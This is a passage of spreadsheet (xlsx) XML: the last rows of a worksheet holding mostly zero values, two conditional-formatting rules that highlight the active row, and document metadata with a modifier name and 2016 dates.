        <v>0</v>
      </c>
    </row>
    <row r="501" spans="1:21" ht="24">
      <c r="A501" s="7" t="s">
        <v>504</v>
      </c>
      <c r="B501" s="1">
        <v>0</v>
      </c>
      <c r="C501" s="12">
        <v>0</v>
      </c>
      <c r="D501" s="9">
        <v>0</v>
      </c>
      <c r="E501" s="9">
        <v>0</v>
      </c>
      <c r="F501" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U501" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="502" spans="1:21">
      <c r="A502"/>
      <c r="B502"/>
      <c r="C502" s="13"/>
      <c r="D502"/>
      <c r="E502"/>
      <c r="F502"/>
      <c r="G502"/>
      <c r="H502"/>
      <c r="I502"/>
      <c r="J502"/>
      <c r="K502"/>
      <c r="L502"/>
      <c r="N502" s="13"/>
      <c r="O502" s="13"/>
      <c r="P502" s="13"/>
      <c r="Q502" s="13"/>
      <c r="R502" s="13"/>
      <c r="S502" s="13"/>
    </row>
    <row r="503" spans="1:21" s="3" customFormat="1">
      <c r="A503" s="10"/>
      <c r="B503" s="9"/>
      <c r="C503" s="14"/>
      <c r="N503" s="15"/>
      <c r="O503" s="15"/>
      <c r="P503" s="14"/>
      <c r="Q503" s="14"/>
      <c r="R503" s="14"/>
      <c r="S503" s="14"/>
      <c r="T503" s="18"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="B2:T501">
    <cfRule type="expression" dxfId="1" priority="2">
      <formula>ROW(A2)=ActiveRow</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A1:XFD501 A503:XFD1048576">
    <cfRule type="expression" dxfId="0" priority="1">
      <formula>ROW(A1)=ActiveRow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</dc:creator>
  <cp:lastModifiedBy>kanokporn</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-06-22T07:43:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-07-04T13:21:55Z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e88cd2d6-5f54-4ce1-9796-00e706967e4d</vt:lpwstr>
  </property>
</Properties>
</file>